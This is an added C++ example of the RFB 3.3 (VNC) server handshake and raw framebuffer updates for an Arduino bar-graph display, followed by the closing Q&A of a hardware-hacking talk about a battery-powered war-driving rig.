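The speakers' VNC server is on the board, not on the page. The block below is an added example, not their code, of the RFB 3.3 exchange a minimal server has to get right for a 255 by 255 screen of analog-pin bars, written in host-side C++ so the messages can be checked byte for byte. Two design points are this example's own: an 8-bit BGR233 pixel format so a raw rectangle is one byte per pixel, and rows rendered on demand, because a 255 by 255 framebuffer is 65 KB and the chip has 2 KB of RAM. It also validates the client's FramebufferUpdateRequest before trusting its coordinates, which is the check such a server must make. Readings are assumed to be 10-bit (0 to 1023), as the ATmega ADC returns.

```cpp
// Added example (not the talk's VNC server): RFB 3.3 server-side messages for
// a 255x255, 8 bpp framebuffer whose content is six bar graphs of analog
// readings. Rows are produced one at a time so the server never holds the
// whole framebuffer; here the update is written to a buffer so it can be
// checked, where the Arduino would write each row straight to the socket.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v;
}

static const uint16_t FB_W = 255, FB_H = 255;
static const int N_ANALOG = 6;

// Server's first two messages in RFB 3.3: the version string, then the
// security type as a 32-bit big-endian value (1 = None). The client answers
// with its own version string and then a one-byte ClientInit (shared flag).
size_t rfb_server_hello(uint8_t *out) {
    memcpy(out, "RFB 003.003\n", 12);
    put32(out + 12, 1);
    return 16;
}

// ServerInit: framebuffer size, pixel format, desktop name.
size_t rfb_server_init(const char *name, uint8_t *out) {
    put16(out, FB_W); put16(out + 2, FB_H);
    uint8_t *pf = out + 4;
    pf[0] = 8;  pf[1] = 8;                                 // bits-per-pixel, depth
    pf[2] = 0;  pf[3] = 1;                                 // big-endian flag, true-colour flag
    put16(pf + 4, 7); put16(pf + 6, 7); put16(pf + 8, 3);  // red, green, blue max (BGR233)
    pf[10] = 0; pf[11] = 3; pf[12] = 6;                    // red, green, blue shift
    pf[13] = pf[14] = pf[15] = 0;                          // padding
    size_t n = strlen(name);
    put32(out + 20, (uint32_t)n);
    memcpy(out + 24, name, n);
    return 24 + n;
}

// Client -> server FramebufferUpdateRequest (type 3, 10 bytes). Rejects a
// malformed message or a region outside the framebuffer rather than letting
// the client's coordinates drive the row loop below.
struct UpdateReq { bool incremental; uint16_t x, y, w, h; };
bool rfb_parse_update_request(const uint8_t *msg, size_t len, UpdateReq *req) {
    if (len < 10 || msg[0] != 3) return false;
    req->incremental = msg[1] != 0;
    req->x = (uint16_t)((msg[2] << 8) | msg[3]); req->y = (uint16_t)((msg[4] << 8) | msg[5]);
    req->w = (uint16_t)((msg[6] << 8) | msg[7]); req->h = (uint16_t)((msg[8] << 8) | msg[9]);
    if (req->w == 0 || req->h == 0) return false;
    if ((uint32_t)req->x + req->w > FB_W || (uint32_t)req->y + req->h > FB_H) return false;
    return true;
}

// One row of the bar-graph view: bar i occupies columns [i*40, i*40+32) and
// grows up from the bottom in proportion to its 10-bit reading.
void render_row(uint16_t y, const uint16_t readings[N_ANALOG], uint8_t *row) {
    memset(row, 0x00, FB_W);                           // black background
    for (int i = 0; i < N_ANALOG; i++) {
        uint16_t bar_h = (uint16_t)((uint32_t)readings[i] * FB_H / 1024);
        if (y >= FB_H - bar_h) memset(row + i * 40, 0x07, 32);   // 0x07 = full red in BGR233
    }
}

// FramebufferUpdate (type 0) with one raw-encoded rectangle for the requested
// region. Returns bytes written, or 0 if out cannot hold it.
size_t rfb_raw_update(const UpdateReq &req, const uint16_t readings[N_ANALOG],
                      uint8_t *out, size_t cap) {
    size_t need = 16 + (size_t)req.w * req.h;
    if (cap < need) return 0;
    out[0] = 0; out[1] = 0; put16(out + 2, 1);         // message type, padding, 1 rectangle
    put16(out + 4, req.x); put16(out + 6, req.y);
    put16(out + 8, req.w); put16(out + 10, req.h);
    put32(out + 12, 0);                                // encoding 0 = Raw
    uint8_t row[FB_W];
    size_t p = 16;
    for (uint16_t y = req.y; y < req.y + req.h; y++) {
        render_row(y, readings, row);                  // 255 bytes of RAM, not 65 KB
        memcpy(out + p, row + req.x, req.w);
        p += req.w;
    }
    return p;
}

int main() {
    static uint8_t buf[16 + 255 * 255];
    uint16_t readings[N_ANALOG] = {1023, 768, 512, 256, 64, 0};   // constructed, not live pins
    printf("hello: %zu bytes, init: %zu bytes\n", rfb_server_hello(buf), rfb_server_init("arduino", buf));
    uint8_t req_msg[10] = {3, 0, 0, 0, 0, 0, 0, 255, 0, 255};    // full-screen, non-incremental
    UpdateReq req;
    if (rfb_parse_update_request(req_msg, sizeof req_msg, &req))
        printf("update: %zu bytes\n", rfb_raw_update(req, readings, buf, sizeof buf));
    return 0;
}
```

Nothing in this exchange authenticates the client: security type None is what makes the server fit in the chip, and it means anyone who can reach the port sees the readings, which is worth remembering when the unit is left "in a target area".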
So yeah, if it's a field where you like to do things for the first time, there's heaps of space there, there's heaps of opportunity for doing cool hacks, if that's what motivates you. I'm sure it doesn't. Thank you. That was in case the VNC demo didn't work. So that pretty much covers the main stuff that we wanted to talk about. We've got a few minutes for any questions, or you can talk to us in the Q&A room later. Did you have anything else there? Any questions? Yeah. Cool, thanks for your time and we can see you in the Q&A room. Okay, yeah. Well, when I was... so the question is, what's the power consumption of the war-driving rig? So this was running off four AA batteries quite happily for quite a long time. And so, yeah. Now the other thing is that you can also reduce the size of this quite a bit. These are just using the standard shields. If you wanted to create a custom PCB then you could reduce the size of it, probably to maybe, you know, kind of half. Yeah, also. Cool. Okay, thanks a lot for your time.